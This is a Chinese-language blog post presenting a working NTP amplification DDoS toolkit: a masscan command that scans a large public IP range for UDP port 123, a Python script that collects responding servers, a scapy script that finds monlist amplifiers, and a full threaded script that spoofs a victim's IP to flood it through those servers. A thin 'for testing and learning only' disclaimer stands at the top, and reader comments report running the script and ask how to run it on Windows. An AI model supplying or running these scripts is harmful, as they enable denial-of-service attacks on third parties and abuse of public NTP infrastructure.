NTP放大攻击python脚本

NTP放大攻击其实就是DDoS的一种。通过NTP服务器,可以把很小的请求变成很大的响应,这些响应可以直接指向到受害者的电脑。下面是python实现脚本,脚本只供测试和学习。
masscan是一个快速的端口扫描器
1.安装masscan

https://github.com/robertdavidgraham/masscan

2.扫描IP段端口,生成文件

./masscan -pU:123 -oX ntp.xml --rate 160000 101.0.0.0-120.0.0.0

3.去掉重复,生成新文件

from lxml import etree
port = None
address = None
parsedServers = []
#Opens the file used to store single enteries.
outputFile = open('port123.txt', 'a')
for event, element in etree.iterparse('ntp.xml', tag="host"):
    for child in element:
        if child.tag == 'address':
            address = child.attrib['addr']
        if child.tag == 'ports':
            for a in child:
                port = a.attrib['portid']
        if port > 1 and address > 1:
            if address not in parsedServers:
                print address
                outputFile.write(address + '\n')
                parsedServers.append(address)
            port = None
            address = None
    element.clear()
outputFile.close()
print 'End'

4.完整攻击代码

from scapy.all import *
import thread
rawData = "\x17\x00\x03\x2a" + "\x00" * 61
logfile = open('port123.txt', 'r')
outputFile = open('monlistServers.txt', 'a')
def sniffer():
    sniffedPacket = sniff(filter="udp port 48769 and dst net 99.99.99.99", store=0, prn=analyser)
 
def analyser(packet):
    if len(packet) > 200:
        if packet.haslayer(IP):
            print packet.getlayer(IP).src
            outputFile.write(packet.getlayer(IP).src + '\n')
 
thread.start_new_thread(sniffer, ())
 
for address in logfile:
    send(IP(dst=address)/UDP(sport=48769, dport=123)/Raw(load=rawData))
print 'End'

https://github.com/vpnguy/ntpdos

#!/usr/bin/env python
from scapy.all import *
import sys
import threading
import time
#NTP Amp DOS attack
#by DaRkReD
#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10
#FOR USE ON YOUR OWN NETWORK ONLY
 
 
#packet sender
def deny():
	#Import globals to function
	global ntplist
	global currentserver
	global data
	global target
	ntpserver = ntplist[currentserver] #Get new server
	currentserver = currentserver + 1 #Increment for next 
	packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT
	send(packet,loop=1) #SEND IT
 
#So I dont have to have the same stuff twice
def printhelp():
	print "NTP Amplification DOS Attack"
	print "By DaRkReD"
	print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"
	print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
	print "NTP serverlist file should contain one IP per line"
	print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
	exit(0)
 
if len(sys.argv) < 4:
	printhelp()
#Fetch Args
target = sys.argv[1]
 
#Help out idiots
if target in ("help","-h","h","?","--h","--help","/?"):
	printhelp()
 
ntpserverfile = sys.argv[2]
numberthreads = int(sys.argv[3])
#System for accepting bulk input
ntplist = []
currentserver = 0
with open(ntpserverfile) as f:
    ntplist = f.readlines()
 
#Make sure we dont out of bounds
if  numberthreads > int(len(ntplist)):
	print "Attack Aborted: More threads than servers"
	print "Next time dont create more threads than servers"
	exit(0)
 
#Magic Packet aka NTP v2 Monlist Packet
data = "\x17\x00\x03\x2a" + "\x00" * 4
 
#Hold our threads
threads = []
print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
print "Use CTRL+C to stop attack"
 
#Thread spawner
for n in range(numberthreads):
    thread = threading.Thread(target=deny)
    thread.daemon = True
    thread.start()
 
    threads.append(thread)
 
#In progress!
print "Sending..."
 
#Keep alive so ctrl+c still kills all them threads
while True:
	time.sleep(1)

2条评论

  1. NTP放大攻击python脚本
    avatar
    Lv.1 1楼

    小白运行成功,不会英语好难呀。谢谢大佬脚本

  2. NTP放大攻击python脚本
    avatar
    Lv.1 2楼

    这个如何在WINDOWS上面使用?装了Python后下载ntpdos.py运行就是一闪而过。。

    发表评论

  1. 😉
  2. 😐
  3. 😡
  4. 😈
  5. 🙂
  6. 😯
  7. 🙁
  8. 🙄
  9. 😛
  10. 😳
  11. 😮
  12. emoji-mrgree
  13. 😆
  14. 💡
  15. 😀
  16. 👿
  17. 😥
  18. 😎
  19. 😕
  20. 62 queries in 0.191 seconds